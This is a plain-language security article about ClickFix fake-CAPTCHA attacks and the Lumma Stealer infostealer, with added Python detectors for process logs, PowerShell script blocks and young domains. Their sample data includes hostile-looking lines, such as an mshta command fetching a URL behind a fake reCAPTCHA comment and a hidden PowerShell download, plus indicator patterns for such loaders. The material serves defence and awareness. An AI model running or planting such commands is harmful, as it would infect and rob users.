The Media Glen | Synexmedia.com
You have done it a thousand times. You land on a webpage, and a little box pops up asking you to prove you are not a robot. You click the checkbox. Maybe you pick out a few blurry photographs of traffic lights or fire hydrants. It takes four seconds. You move on with your life and never think about it again.
That trained behaviour, that muscle memory, is now being used to steal everything you own online. And the people doing it are counting on the fact that you won't stop to question the box. Because you never have before. Why would you start now?
This is the story of how a tiny piece of internet furniture, the CAPTCHA verification box, got turned into a weapon. Not a gun. Something quieter. More like a trapdoor built into your living room floor, disguised to look exactly like the carpet.
The Thing You Trust Without Thinking
CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart. That is a mouthful, which is why nobody calls it that. What matters is the idea behind it. Websites use CAPTCHAs to verify that the person clicking buttons is a real human being and not a bot trying to spam, scrape, or break things.
Google's reCAPTCHA and Cloudflare's Turnstile are the two systems you encounter most often. You see the little checkbox. You click it. Some invisible math happens on the back end, and the website decides you are probably human. This has been part of browsing the internet for over a decade.
And that is exactly the problem.
People trust CAPTCHAs the way they trust elevator buttons. The interaction is automatic. You do not read the fine print. You do not ask yourself whether the box is real. It looks right. It feels right. You click.
Somebody figured out that this automatic trust could be exploited. And once the first group figured it out, everybody else piled on.
How the Trick Works, Step by Step
Here is what happens. You are browsing the internet, maybe looking for a free movie stream, maybe clicking a link in an email, maybe visiting a website that got quietly compromised without its owner knowing. You land on a page, and up comes what looks exactly like a Cloudflare verification screen or a Google reCAPTCHA box. Same colours. Same fonts. Same little shield logo. Same checkbox.
But it is not real. It is a fake, built from scratch in a single HTML file, designed to look pixel-perfect.
You click the checkbox. Nothing actually verifies anything. Instead, a hidden script fires behind the curtain. It creates a tiny, invisible text box on the page, pastes a line of code into it, copies that code to your computer's clipboard, and deletes the text box. All of this happens in a fraction of a second. You see none of it.
Now comes the part that makes this attack work. A second set of instructions appears on the screen. They look official. They tell you to complete the verification by pressing three key combinations on your keyboard.
Step one, press Windows key plus R. That opens a small box on your computer called the Run dialogue, which lets you type commands directly into the operating system. Step two, press Control plus V. That pastes whatever is on your clipboard into the Run box. Step three, press Enter.
That is it. Three keystrokes. You just ran a command on your own computer, voluntarily, because a fake CAPTCHA told you to. And the command you pasted is not a verification code. It is an instruction that tells your computer to reach out to a server on the internet, download a file, and run it. The file is malware.
Why You Don't See the Danger
The malicious command pasted into the Run dialogue is deliberately designed so that most of it sits off-screen, hidden to the left. The only text visible in the narrow Run box is something innocent, something like: I am not a robot – reCAPTCHA Verification ID: 5mUiAHM. That's what you see. The actual command, the dangerous part, is scrolled out of view.
The attackers even use a trick with punctuation. In the scripting language the command is written in, a single quotation mark works like a comment marker. Everything after it gets ignored by the computer as a note. So the visible "verification ID" text is technically a comment, invisible to the machine, placed there purely to fool you.
You see a verification code. Your computer sees an order to download and install malware. Both of you are looking at the same text. Neither of you sees what the other one sees.
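The launch chain above leaves a recognisable trace in endpoint telemetry: a scripting host started directly from Explorer (which is what the Run box does), a URL on its command line, and a command whose tail is a comment containing the lure text. The Python below is an added example of how a detection rule over process-creation records could encode that; it is not code from this article or from any security vendor. The log it scans is constructed (hostnames under the reserved `example.invalid`, a simplified field layout loosely modelled on Sysmon Event ID 1), and the list of launchers beyond mshta, PowerShell and nslookup is an assumption.

```python
"""
Detection sketch for the fake-CAPTCHA Run-box launch chain.
Added example, not code from the article or any vendor product.
The log below is constructed: one simplified process-creation record per
line (parent image | image | command line), not real telemetry.
"""
import re

# Launchers the pasted command typically hands a URL or query to. mshta,
# PowerShell and nslookup are named in the article; cmd.exe, pwsh.exe and
# curl.exe are added here as an assumption.
RUN_BOX_LAUNCHERS = {"mshta.exe", "powershell.exe", "pwsh.exe",
                     "cmd.exe", "curl.exe", "nslookup.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Phrases the lure leaves visible in the narrow Run box.
LURE_RE = re.compile(r"not a robot|recaptcha|verification id|cloudflare",
                     re.IGNORECASE)
# A trailing comment marker, '#' (PowerShell) or a quote mark (VBScript-style),
# preceded by whitespace so that quoted paths are not mistaken for one.
COMMENT_RE = re.compile(r"\s(?:#|')\s*(.*)$")

# Constructed sample log. The verification-ID tail mirrors the one the
# article quotes; everything else is made up for the example.
SAMPLE_LOG = r"""
parent=C:\Windows\explorer.exe|image=C:\Windows\System32\mshta.exe|cmdline=mshta https://example.invalid/verify # ''I am not a robot - reCAPTCHA Verification ID: 5mUiAHM''
parent=C:\Windows\explorer.exe|image=C:\Windows\System32\notepad.exe|cmdline=notepad C:\Users\alice\notes.txt
parent=C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell -w hidden -c "iwr https://example.invalid/stage2"
parent=C:\Windows\explorer.exe|image=C:\Windows\System32\nslookup.exe|cmdline=nslookup -type=txt example.invalid
parent=C:\Windows\System32\cmd.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell -File C:\scripts\backup.ps1
"""


def parse_event(line):
    """Split one constructed record into fields with basename-normalised images."""
    def basename(path):
        return path.rsplit("\\", 1)[-1].lower()
    parent, image, cmdline = (field.split("=", 1)[1] for field in line.split("|", 2))
    return {"parent": basename(parent), "image": basename(image), "cmdline": cmdline}


def split_decoy(cmdline):
    """Return (executed part, visible decoy). The shell ignores everything after
    the comment marker; a user looking at a narrow Run box sees only that part."""
    match = COMMENT_RE.search(cmdline)
    if not match:
        return cmdline, ""
    return cmdline[:match.start()].rstrip(), match.group(1).strip("' ")


def assess(event):
    """Return the list of reasons an event resembles the fake-CAPTCHA chain."""
    executed, decoy = split_decoy(event["cmdline"])
    lowered = executed.lower()
    reasons = []
    if event["parent"] == "explorer.exe" and event["image"] in RUN_BOX_LAUNCHERS:
        reasons.append("launcher started from Explorer (Run box / address bar pattern)")
    if event["image"] in RUN_BOX_LAUNCHERS and URL_RE.search(executed):
        reasons.append("launcher handed a URL on the command line")
    if decoy and LURE_RE.search(decoy):
        reasons.append("CAPTCHA lure text hidden in a trailing comment: " + decoy)
    if event["image"] == "nslookup.exe" and "-type=txt" in lowered:
        reasons.append("TXT record lookup from nslookup (DNS-based instruction fetch)")
    if "-w hidden" in lowered or "-windowstyle hidden" in lowered:
        reasons.append("PowerShell asked to hide its window")
    return reasons


def scan(log_text):
    """Return (image, reasons) for every record that triggers at least one rule."""
    hits = []
    for line in log_text.strip().splitlines():
        event = parse_event(line)
        reasons = assess(event)
        if reasons:
            hits.append((event["image"], reasons))
    return hits


if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_LOG):
        print(image)
        for reason in reasons:
            print("   -", reason)
```

Run as a script it prints the three flagged records (mshta from Explorer with a URL and a lure comment, a hidden PowerShell download, and an nslookup TXT query from Explorer) and stays silent on the two ordinary ones. The `split_decoy` test is equally useful on clipboard contents or on the Run box history Windows keeps in the user's registry, since the pasted command survives there in full, hidden tail included.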
What Gets Installed on Your Machine
The malware delivered through this technique is most commonly something called Lumma Stealer. It is an information-stealing program that has been available for purchase on criminal forums since late 2022. It is sold as a subscription service, the same way you might subscribe to Netflix, except the product is a tool for robbing people.
Subscription tiers run from around $250 per month at the entry level up to $1,000 per month for premium features. For $20,000, a buyer can purchase the full source code. That price includes the right to resell.
The program is written in C and C++ with assembly language routines. It does not care what browser you use. Chrome, Firefox, Edge, Opera, Brave. It raids all of them. It grabs saved passwords, stored credit card numbers, autofill data, browsing history, and session cookies. Those cookies are particularly dangerous because they can let an attacker log into your accounts without needing your password at all. They just step into your existing session like putting on someone else's coat.
But it does not stop at browsers. The stealer searches for cryptocurrency wallet files. It looks for seed phrases, those strings of random words that serve as the master key to a crypto wallet. It hunts for password manager databases. It grabs login tokens from Discord, Telegram, and Steam. It takes screenshots of your desktop. It copies your clipboard contents. If you have remote desktop software like AnyDesk installed, it grabs those configuration files too, which can give attackers a way back into your machine later.
One of the more disturbing capabilities is its ability to turn your computer into a proxy server. Once infected, your internet connection can be rented out to other criminals, who route their traffic through your machine to hide their own location. Your IP address becomes their mask.
How It Hides
Lumma Stealer does not just run in the open. The delivery process uses multiple layers of obfuscation, meaning the actual malicious program is buried inside a series of encrypted wrappers, like a set of nesting dolls.
The initial command triggers a legitimate Windows program called mshta.exe. This is a real Microsoft tool, digitally signed, present on every Windows machine. It was designed to run small web-based scripts. But because it is a trusted system file, security software often lets it operate without interference. The attackers exploit that trust.
That trusted program then calls PowerShell, another legitimate Windows tool, to fetch the next stage. The next stage is encrypted. When it gets decrypted, it reveals another encrypted layer. And another. Security researchers at Trustwave documented one chain that used five separate layers of encryption and obfuscation before the actual malware appeared. One of the decryption keys in that chain was the phrase AMSI_RESULT_NOT_DETECTED, a mocking reference to Microsoft's own malware detection system.
The final stage of delivery uses a technique called process hollowing. The malware starts a legitimate Windows program, a program your security software already trusts, and scoops out its insides. It replaces the legitimate code running in memory with its own code, wearing the trusted program like a suit. A favourite target for this trick is BitLockerToGo.exe, a real Microsoft utility for managing encrypted USB drives. As far as your computer can tell, a normal Microsoft program is running. What is actually running inside that shell is the stealer.
There is even a variant that hides its code inside the pixel data of ordinary-looking PNG image files. The malicious payload is encoded into specific colour channels of the image. A normal image viewer would display the picture without issues. But the delivery script reads the raw pixel values, extracts the hidden code, decrypts it, and runs it entirely in memory without ever writing a file to disk. Security scanners that only examine files sitting on the hard drive will never see it.
How the Fake CAPTCHAs Reach You
The fake verification pages reach victims through several different channels, and this is part of what makes the technique so effective. There is no single attack vector to block.
The most common route is through compromised websites. By early 2025, security researchers had identified over nine thousand WordPress sites infected with malicious code that injects the fake CAPTCHA screen into normal browsing sessions. Most of these site owners had no idea their websites were being used as attack platforms. The compromise often happens through stolen login credentials or through fraudulent WordPress plugins that look legitimate but contain hidden code.
Malicious advertising is another major vector. One documented campaign pushed over one million ad impressions per day across three thousand websites, mostly pirate streaming sites and cracked software download pages. The ads used a legitimate advertising network for distribution and a traffic analytics service for cloaking, meaning the malicious ads could detect when they were being analysed by a security researcher and serve harmless content instead.
Phishing emails carry the fake CAPTCHAs too. Some impersonate GitHub security alerts, sending developers to fake pages where they are told to verify their identity. Others disguise themselves as hotel booking confirmations or invoice notifications.
There have even been tutorial videos posted to social media platforms showing viewers how to "activate" pirated software. The tutorials walk people through the exact keyboard sequence needed to trigger the infection, presenting the malware execution as a normal part of the software activation process.
Legitimate cloud services get abused as hosting infrastructure for the fake pages. One analysis found that nearly a quarter of all identified fake CAPTCHA hosts were using a major content delivery network's infrastructure, including its web hosting, cloud storage, and proxy services. Amazon cloud storage buckets, Oracle Cloud instances, and various content delivery networks have all been caught hosting the malicious pages.
One of the more creative infrastructure tricks involves storing malicious code on a cryptocurrency blockchain. Because blockchain data cannot be modified or removed once written, the attackers can store their malicious JavaScript and download links in blockchain smart contracts. Traditional domain blocking does not work against this technique. You cannot send a takedown notice to a blockchain.
The Technique Has a Name, and It Keeps Evolving
Security researchers call this class of attack "ClickFix." The name was coined by the threat intelligence firm Proofpoint, which first documented it in March 2024. But the technique did not stay static. It kept changing.
The original version, from early 2024, used fake error messages rather than CAPTCHAs. Pages pretended to be Microsoft Word, Google Chrome, or OneDrive, displaying fake error dialogues that told users to copy and paste a fix. Over a hundred thousand emails were sent in the initial campaigns, targeting thousands of organisations.
By mid-2024, the fake CAPTCHA variant emerged. This was the version that really took off, because it exploited the deepest kind of trained internet behaviour. People have been trained for years to expect CAPTCHAs. They have been trained to comply with them without thinking. Security researchers call this "verification fatigue."
Then the variants started multiplying. One version, discovered in 2025, instructs users to paste commands into the File Explorer address bar instead of the Run dialogue. Another forces the user's browser to crash deliberately, then presents the fake CAPTCHA as part of a "recovery" process. A third variant uses DNS lookup commands instead of PowerShell, fetching instructions through the domain name system rather than through web downloads. Underground criminal markets now sell ready-made ClickFix toolkits with customisable lures and sandbox detection for anywhere from $200 to $1,500 per month.
The technique is not limited to Windows anymore. Variants targeting macOS have been documented, instructing users to open the Terminal application and paste commands there instead.
And it is not limited to criminal gangs. State-sponsored intelligence services from at least three countries have adopted the technique for espionage operations. North Korean groups have used it to target think tanks and software developers. An Iranian group used it to impersonate Microsoft security updates and target organisations across the Middle East, timing the fake updates to coincide with real Microsoft Patch Tuesday releases so the lure would seem plausible. Russian military intelligence used it to deliver espionage tools through fake Google Spreadsheet prompts.
When intelligence services with nation-state resources look at a criminal technique and decide it is good enough to adopt for their own operations, that tells you something about how effective the technique is.
The Numbers
By mid-2025, security vendor analysis concluded that ClickFix-style attacks accounted for 47 per cent of all observed initial access compromises. Nearly half. One technique. That figure comes from Microsoft's own analysis published in August 2025.
The FBI attributed roughly ten million infections worldwide to Lumma Stealer specifically. Microsoft identified 394,000 infected Windows computers in just a two-month window between March and May of 2025. One security firm tracked 13,695 unique hosts serving ClickFix pages across approximately 500 different hosting providers in a span of two and a half months.
Detections of Lumma Stealer surged 369 per cent between the first and second halves of 2024. ClickFix attacks grew another 517 per cent between the second half of 2024 and the first half of 2025. The growth curve looked less like a trend and more like an explosion.
Countries hit hardest include India, Brazil, Spain, France, the United States, Mexico, Peru, Poland, Germany, and Canada. The affected industries cover telecommunications, healthcare, banking, technology, manufacturing, education, and government. Some compromised hosts were found running on government and military infrastructure.
The Takedown That Didn't Stick
On May 21, 2025, a coordinated international operation tried to shut the whole thing down. Microsoft's Digital Crimes Unit led the effort, partnering with the U.S. Department of Justice, the FBI, Europol, and security firms including ESET, Bitsight, and Cloudflare. A court order out of the Northern District of Georgia authorised the seizure of approximately 2,300 malicious domains. The Department of Justice seized five core administration panel domains. The FBI even posted messages inside the operators' own Telegram channels, claiming that administrators were cooperating with law enforcement.
Europol called Lumma Stealer "the world's most significant infostealer threat."
It did not matter.
No arrests were made. The developer, believed to be based in Russia, claimed through online channels that authorities had accessed a server through a hardware vulnerability but that functionality had been restored quickly. Within weeks, Lumma Stealer was back to pre-takedown activity levels, operating through new domains registered at a rate of approximately 74 per week. The infrastructure simply moved to Russian hosting providers.
Seizing 2,300 domains sounds impressive until you realise that over 3,300 unique command-and-control domains had been tracked in a single year of observation, and the operators could spin up replacements faster than anyone could take them down.
Domain seizure as a countermeasure has structural limits. It works against operators who cannot easily relocate. It does not work against operators who have already built their infrastructure to be disposable.
Can It Still Be Done Today?
Yes.
Every component of this attack is still fully functional as of early 2026. The social engineering trick has not been patched because it does not exploit a software bug. It exploits a human habit. There is no update Microsoft can push, no code Cloudflare can write, that fixes the fact that people have been conditioned to comply with CAPTCHA prompts without scrutiny.
The Windows Run dialogue still exists on every Windows machine. Mshta.exe still ships with every copy of Windows. PowerShell still allows the execution of remotely fetched scripts by default. The clipboard API that allows websites to silently write to your clipboard still functions in major browsers. None of these individual components are flaws by themselves. Each one has a legitimate purpose. But strung together by a social engineering trick, they become an infection chain.
New variants continue to appear. The CrashFix variant from January 2026 is particularly clever, because it removes the question of "why is this website asking me to do something unusual?" by first making the browser crash. When the crash recovery page appears with the fake CAPTCHA, the user already has a plausible explanation in mind: something went wrong, and this is part of fixing it. The technique feeds on the user's own rationalisation.
The DNS-based variant discovered in February 2026 is another adaptation. Some organisations have started blocking PowerShell web requests as a defence. So the new variant uses nslookup, a different Windows command used for looking up domain name records, to fetch instructions through the DNS system instead. Block one path, and the attackers find another.
The criminal marketplace for this technique is thriving. Ready-made toolkits are available for purchase. The attack does not require significant technical skill to deploy. If you can set up a webpage, you can run a ClickFix campaign.
How to Protect Yourself
The single most important thing to understand is this: a real CAPTCHA will never ask you to press keyboard shortcuts, open a Run dialogue, paste commands, or interact with anything outside your web browser. A real CAPTCHA lives entirely within the browser window. You click a checkbox. You identify some photographs. That is it. The moment a "verification" page asks you to use your keyboard to perform system operations, you are looking at an attack.
If a website ever asks you to press Windows plus R as part of proving you are human, close the tab. Do not follow the instructions. Do not paste anything. Close the tab and leave.
For organisations, the technical defences are concrete. Group Policy can be used to disable the Run dialogue for standard users, which closes the primary entry point entirely. Application control policies like AppLocker can block the execution of mshta.exe, which breaks the most common version of the attack chain. PowerShell can be configured to run in Constrained Language Mode, which limits the commands it can execute. Script Block Logging can be enabled to record exactly what PowerShell commands are run, creating an audit trail.
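Script Block Logging only pays off if someone looks at what it records, and the nested wrappers described in the "How It Hides" section are exactly what to look for in it. The Python below is an added example, not code from the article or from any vendor, of a first-pass triage over logged script text: it counts how many base64 layers a literal is wrapped in and flags the tell-tale strings (the AMSI phrase and the BitLockerToGo name come from the article; the .NET and PowerShell API names in the indicator table are the usual calls such loaders make and are an assumption). The script blocks it runs on are constructed stand-ins whose innermost payload is a harmless echo.

```python
"""
Triage helpers for PowerShell Script Block Logging output (Event ID 4104).
Added example, not code from the article or any vendor. The script blocks
below are constructed stand-ins that merely contain the tell-tale strings.
"""
import base64
import binascii
import re

# Indicators to hunt for in logged script text. AMSI_RESULT_NOT_DETECTED and
# BitLockerToGo.exe come from the article; the API names are an assumption.
INDICATORS = {
    "base64 layer": re.compile(r"FromBase64String", re.I),
    "string eval": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
    "remote fetch": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\b(?:iwr|irm)\b", re.I),
    "AMSI reference": re.compile(r"AMSI", re.I),
    "image pixel read": re.compile(r"System\.Drawing\.Bitmap|GetPixel|LockBits", re.I),
    "hollowing target": re.compile(r"BitLockerToGo\.exe", re.I),
    "in-memory assembly": re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}
B64_LITERAL_RE = re.compile(r"[A-Za-z0-9+/=]{24,}")


def _decode_layer(text):
    """Decode one base64 wrapper if it yields readable text; otherwise None."""
    compact = re.sub(r"\s+", "", text)
    if len(compact) < 8:
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        # -EncodedCommand payloads are UTF-16LE (every other byte is NUL).
        decoded = raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if decoded and all(c.isprintable() or c.isspace() for c in decoded):
        return decoded
    return None


def peel_layers(blob, max_layers=10):
    """Strip nested base64 wrappers; return (layers removed, innermost text)."""
    text = blob
    for depth in range(max_layers):
        inner = _decode_layer(text)
        if inner is None:
            return depth, text
        text = inner
    return max_layers, text


def wrap_layers(text, layers):
    """Build a constructed sample: base64-encode `text` `layers` times."""
    for _ in range(layers):
        text = base64.b64encode(text.encode("utf-8")).decode("ascii")
    return text


def wrap_encoded_command(text):
    """Build a constructed -EncodedCommand style (UTF-16LE) sample."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def triage_block(text):
    """Return the indicators found and the deepest base64 nesting in one block."""
    found = [name for name, rx in INDICATORS.items() if rx.search(text)]
    depth = max((peel_layers(lit)[0] for lit in B64_LITERAL_RE.findall(text)), default=0)
    return {"indicators": found, "layers": depth}


def triage(blocks):
    """Triage a list of logged script blocks in order."""
    return [triage_block(block) for block in blocks]


# Constructed 4104 script-block texts; the wrapped payload is a harmless echo.
SAMPLE_SCRIPT_BLOCKS = [
    "$s = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
    + wrap_layers("Write-Output 'stage two'", 3) + "')); Invoke-Expression $s",
    "Get-ChildItem C:\\Logs -Filter *.log | Where-Object LastWriteTime -lt (Get-Date).AddDays(-30) | Remove-Item",
    "$img = New-Object System.Drawing.Bitmap $p; $px = $img.GetPixel(0, 0); $k = 'AMSI_RESULT_NOT_DETECTED'",
]

if __name__ == "__main__":
    for block, verdict in zip(SAMPLE_SCRIPT_BLOCKS, triage(SAMPLE_SCRIPT_BLOCKS)):
        print(verdict["layers"], "layer(s);", ", ".join(verdict["indicators"]) or "clean")
```

The first constructed block scores two indicators and three base64 layers, the log-cleanup script scores nothing, and the third trips the pixel-read and AMSI indicators. Real loaders combine base64 with encryption, so `peel_layers` stops at the first layer it cannot read; the depth it reports is a floor, and a block with even one unreadable layer and an indicator hit is worth a human look.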
DNS filtering that blocks newly registered domains is effective because the command-and-control infrastructure relies on fresh domains, particularly ones using certain top-level domains like .shop, .top, and .icu. Blocking domains that are less than 30 days old will catch a significant portion of this traffic.
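The "younger than 30 days" rule is simple to state but has two details worth getting right: queries must be collapsed to the registrable domain before the age is looked up (a lure on a fresh subdomain of an old domain should not be aged by the subdomain), and names with no registration data at all need an explicit policy. The Python below is an added example of that filter, not code from the article or from any product. It assumes registration dates come from a lookup table; in practice they would be fetched from RDAP or WHOIS or a threat-intelligence feed. The resolver log, the domains and their creation dates are all constructed.

```python
"""
Domain-age filtering over DNS query logs. Added example, not code from the
article or any product. Registration dates and the query log are constructed;
a real deployment would pull dates from RDAP/WHOIS or an intelligence feed.
"""
from datetime import date

MAX_AGE_DAYS = 30
# TLDs the article names as heavily used by this infrastructure.
RISKY_TLDS = {"shop", "top", "icu"}

# Constructed registration records (registrable domain -> creation date).
REGISTRATION_DATES = {
    "captcha-check.shop": date(2026, 2, 25),
    "updates-portal.top": date(2024, 1, 10),
    "example.com": date(1995, 8, 14),
}

# Constructed resolver log: timestamp, client, record type, queried name.
SAMPLE_DNS_LOG = """\
2026-03-02T09:14:05Z 10.0.4.17 A verify.captcha-check.shop
2026-03-02T09:14:09Z 10.0.4.17 A cdn.updates-portal.top
2026-03-02T09:15:30Z 10.0.4.22 A www.example.com
2026-03-02T09:16:02Z 10.0.4.31 TXT unseen-host.icu
"""
NOW = date(2026, 3, 2)  # constructed "current" date for the sample


def registrable_domain(name):
    """Collapse a queried name to its last two labels. A production filter
    should consult the Public Suffix List so that e.g. 'co.uk' is not treated
    as a registrable domain; the two-label rule here is a deliberate
    simplification."""
    labels = name.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def evaluate(name, registrations, today):
    """Return (registrable domain, decision, reason) for one queried name."""
    domain = registrable_domain(name)
    tld = domain.rsplit(".", 1)[-1]
    created = registrations.get(domain)
    if created is None:
        # No age data: fail towards review rather than silently allowing.
        return domain, "review", "no registration data available"
    age = (today - created).days
    if age < MAX_AGE_DAYS:
        return domain, "block", f"registered {age} days ago"
    if tld in RISKY_TLDS:
        return domain, "review", f"{age} days old but on a frequently abused TLD (.{tld})"
    return domain, "allow", f"{age} days old"


def filter_log(log_text, registrations=REGISTRATION_DATES, today=NOW):
    """Evaluate every query in the log; return (domain, decision) pairs."""
    decisions = []
    for line in log_text.strip().splitlines():
        _timestamp, _client, _rtype, name = line.split()
        domain, decision, _reason = evaluate(name, registrations, today)
        decisions.append((domain, decision))
    return decisions


if __name__ == "__main__":
    for line in SAMPLE_DNS_LOG.strip().splitlines():
        queried = line.split()[-1]
        domain, decision, reason = evaluate(queried, REGISTRATION_DATES, NOW)
        print(f"{decision:6} {queried:30} ({domain}: {reason})")
```

With the constructed data the five-day-old `.shop` domain is blocked, the old `.top` domain and the unknown `.icu` host are queued for review, and `www.example.com` is allowed. The TXT query in the last line is the kind of lookup the nslookup variant relies on, which is one reason the filter should see every record type, not only A and AAAA.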
There is even a free, open-source browser extension called StopFix that monitors your clipboard for the presence of system commands and alerts you if a website has silently placed something dangerous there. It is available on GitHub.
But none of these technical measures matter as much as the simple awareness that this trick exists. The attack works because people do not know it is a thing. Once you know that fake CAPTCHAs are a real threat, you are almost impossible to fool by one. The entire attack depends on the victim never having heard of it.
Now you have heard of it.
Behind the Story
This article contains no fictional elements. All technical details, statistics, timelines, and operational descriptions are drawn from published reports by Proofpoint, Microsoft, Qualys, Sekoia, Trustwave SpiderLabs, ESET, Kaspersky, Guardio Labs, Netskope, McAfee Labs, Huntress, Trend Micro, Bitdefender, Lab539, CISA/FBI Joint Advisory AA25-141B, and Europol.
Specific threat actor names and aliases have been excluded except where attribution has been made publicly by government agencies or major security vendors. Technical jargon has been translated into plain language throughout. Where simplified explanations risk inaccuracy, the more precise technical terminology has been preserved and explained in context.
The ClickFix/fake CAPTCHA technique and Lumma Stealer malware remain active threats as of March 2026. Readers who suspect they may have been compromised should change all saved passwords, enable two-factor authentication on critical accounts, and scan their systems with reputable security software. Organisations should review their PowerShell execution policies and consider the Group Policy mitigations described in this article.
Canadian spelling has been used throughout this article and verified.